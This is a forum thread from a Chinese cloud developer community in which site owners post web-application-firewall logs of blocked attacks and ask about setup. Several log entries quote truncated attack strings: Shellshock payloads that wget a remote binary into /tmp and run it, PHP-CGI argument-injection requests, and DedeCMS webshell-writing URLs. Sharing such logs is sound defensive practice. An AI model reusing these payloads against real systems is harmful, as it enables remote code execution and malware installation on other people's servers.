开发者社区> 问答> 正文

晒下记录




晒下记录
大爱WAF。。
攻击IP    攻击时间    攻击URL    攻击类型    处理结果
220.181.158.105    2015-02-05 12:56:31     --    SQL注入攻击    已拦截
220.181.158.105    2015-02-05 12:56:17     --    SQL注入攻击    已拦截
220.181.158.105    2015-02-05 12:55:53     --    SQL注入攻击    已拦截
220.181.158.105    2015-02-05 12:51:57     --    SQL注入攻击    已拦截
220.181.158.105    2015-02-05 12:44:51     --    SQL注入攻击    已拦截
220.181.158.109    2015-02-05 12:05:01     --    SQL注入攻击    已拦截
220.181.158.109    2015-02-05 12:05:01     --    SQL注入攻击    已拦截
220.181.158.109    2015-02-05 12:05:01     --    SQL注入攻击    已拦截
220.181.158.105    2015-02-05 11:57:22     --    SQL注入攻击    已拦截
220.181.158.109    2015-02-05 11:49:14     --    SQL注入攻击    已拦截
220.181.158.109    2015-02-05 11:42:58     --    SQL注入攻击    已拦截
220.181.158.105    2015-02-05 11:19:17     --    SQL注入攻击    已拦截
220.181.158.105    2015-02-05 11:01:45     --    SQL注入攻击    已拦截



展开
收起
go696 2015-02-05 15:54:53 13247 0
8 条回答
写回答
取消 提交回答
  • 请问下这个记录,是哪里的日志,MySQL的error日志,还是正常的日志

    2021-10-12 13:44:47
    赞同 展开评论 打赏
  • Re晒下记录
    我的一样是这些攻击。 请求给解决的办法
    2015-07-07 22:59:48
    赞同 展开评论 打赏
  • Re晒下记录
    120.24.76.11/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://121.207.230.74:911/java -o /tmp/china.z-tmqh >... 其他 已拦截

    -------------------------

    Re晒下记录
    是破壳漏洞(ShellShock),bash远程命令执行

    -------------------------

    Re晒下记录
    这个漏洞怎么解决啊?

    -------------------------

    Re晒下记录
    天天都有被攻击的记录,汗。
    2015-05-06 20:03:36
    赞同 展开评论 打赏
  • Re晒下记录
    那楼主你的云盾是不是一直 是显示异常的状态?
    2015-04-29 15:15:12
    赞同 展开评论 打赏
  •   这都是很简单的防御。。。
    2015-02-15 12:00:38
    赞同 展开评论 打赏
  • 回2楼葛奇的帖子
    没开怎么会监测到这些数据呢

    -------------------------

    回1楼wangxiuqi的帖子
    提交工单问一下吧。。

    -------------------------

    Re晒下记录
    最近又有。。。


    攻击IP        攻击时间        攻击URL        攻击类型        处理结果
    111.17.174.60        2015-02-12 15:37:33        .        SQL注入攻击        已拦截
    111.17.174.60        2015-02-12 15:37:32       .        SQL注入攻击        已拦截
    111.17.174.60        2015-02-12 15:37:31       .        SQL注入攻击        已拦截
    111.17.174.60        2015-02-12 15:37:31       .        SQL注入攻击        已拦截
    111.17.174.60        2015-02-12 15:37:30        .        SQL注入攻击        已拦截
    111.17.174.60        2015-02-12 15:37:29        .        SQL注入攻击        已拦截

    -------------------------

    回6楼kideny的帖子
    只是想晒一下这些IP

    -------------------------

    Re晒下记录
    攻击IP                攻击时间              攻击URL             攻击类型                处理结果
    41.134.153.92      2015-02-27 20:12:02     /cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simu Match1:php://input -d cgi.force_red...      远程代码执行        已拦截
    41.134.153.92     2015-02-27 20:12:02     /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.s Match1:php://input -d cgi.force_red...        远程代码执行        已拦截
    41.134.153.92     2015-02-27 20:12:00     /cgi-bin/php-cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.s Match1:php://input -d cgi.force_red...        远程代码执行        已拦截
    41.134.153.92     2015-02-27 20:11:59     /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simu Match1:php://input -d cgi.force_red...       远程代码执行        已拦截


    -------------------------

    Re晒下记录
    攻击IP攻击时间攻击URL攻击类型处理结果
    200.23.251.1822015-03-06 09:40:46cgi-sys/realsignup.cgi Match1:() { :;};echo; /bin/bash -c . echo 2014 | md5sum.其他已拦截

    -------------------------

    Re晒下记录
    源IP                        攻击时间                       拦截状态(全部)         拦截次数        操作
    203.244.219.1        2015-03-07 05:53:26        已拦截                         1               --
    41.206.58.118        2015-03-04 19:40:27        已拦截                         2               --
    217.230.135.80      2015-03-03 23:25:06        已拦截                         2               --
    123.198.55.132      2015-03-03 10:54:42        已拦截                         2               --
    59.45.79.68            2015-03-02 18:04:12        已拦截                         1               --
    124.205.50.42        2015-03-01 23:46:32        已拦截                         2               --

    -------------------------

    攻击IP                 攻击时间                                 攻击URL                              攻击类型            处理结果
    117.21.176.66        2015-03-28 19:07:56        /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=9 Match1:arrs1[]=99&arrs1[]=102&arrs1[...写入webshell攻击        已拦截
    117.21.176.66        2015-03-28 19:07:56        /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=9 Match1:arrs1[]=99&arrs1[]=102&arrs...        写入webshell攻击        已拦截

    -------------------------

    源IP攻击时间
    拦截状态(全部)
    拦截次数操作
    61.132.107.1942015-04-03 03:40:41已拦截2--
    59.182.188.1322015-03-31 17:01:51已拦截2--
    140.118.132.132015-03-31 12:44:44已拦截2--
    140.207.10.142015-03-29 21:08:04已拦截2--
    115.239.176.602015-03-29 00:48:10已拦截14--


    -------------------------

    攻击IP攻击时间攻击URL攻击类型处理结果
    222.186.21.422015-04-10 20:33:31> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-zvtd. >> /tmp/run.sh;echo /tmp/china.z-zvtd. >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh. " class="ng-scope" style="box-sizing: border-box;">/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://222.186.21.42:999/32 -o /tmp/china.z-zvtd. >...其他已拦截

    -------------------------

    源IP                          攻击时间                       拦截状态(全部)         拦截次数        操作
    124.167.225.186      2015-04-10 06:12:29        已拦截                 2        --
    118.244.228.43        2015-04-08 13:10:46        已拦截                 1        --
    87.138.91.253          2015-04-08 11:59:29        已拦截                 2        --
    213.163.245.57        2015-04-06 22:19:42        已拦截                 2        --
    124.132.22.77          2015-04-06 15:26:32        已拦截                 2        --
    200.103.124.130      2015-04-06 12:44:43        已拦截                 2        --
    67.52.125.130          2015-04-05 22:41:24        已拦截                 2        --

    -------------------------

    攻击IP攻击时间攻击URL攻击类型处理结果
    61.136.186.1742015-04-17 21:59:47XX.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&...SQL注入攻击已拦截
    61.136.186.1742015-04-17 21:59:47XX.net/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&ar...SQL注入攻击已拦截


    -------------------------

    源IP                                攻击时间                   拦截状态     拦截次数        
    84.241.38.98           2015-04-18 06:51:58        已拦截            2
    46.23.53.79             2015-04-17 21:15:41        已拦截            2
    113.248.205.148     2015-04-17 18:01:38        已拦截            2
    222.49.122.224       2015-04-16 18:51:15        已拦截            1
    93.145.69.61           2015-04-16 09:34:18        已拦截            2
    95.6.97.123             2015-04-15 13:18:27        已拦截            2
    122.160.85.17         2015-04-14 06:40:09        已拦截            2
    219.92.86.48           2015-04-12 10:04:23        已拦截            2
    212.159.73.105       2015-04-12 02:27:31        已拦截            2

    -------------------------

    回 18楼(feel2014) 的帖子
    既然被拦截了 那ECS就是安全的哦!!
    2015-02-12 16:35:37
    赞同 展开评论 打赏
  • 回 1楼(wangxiuqi) 的帖子
    根域名还没有开启WAF吧?
    2015-02-07 12:43:19
    赞同 展开评论 打赏
  • Re晒下记录
    为什么我开启了WAF之后,在万网设置过cname后,域名只能加www才可以访问,不加www就不能访问呢??
    2015-02-06 16:30:40
    赞同 展开评论 打赏
滑动查看更多
问答分类:
问答地址:
问答排行榜
最热
最新

相关电子书

更多
一封信 立即下载
在业务量暴增中痛并快乐--数据交易平台的成长记事 立即下载
在业务量暴增中痛并快乐——数据交易平台的成长记事 立即下载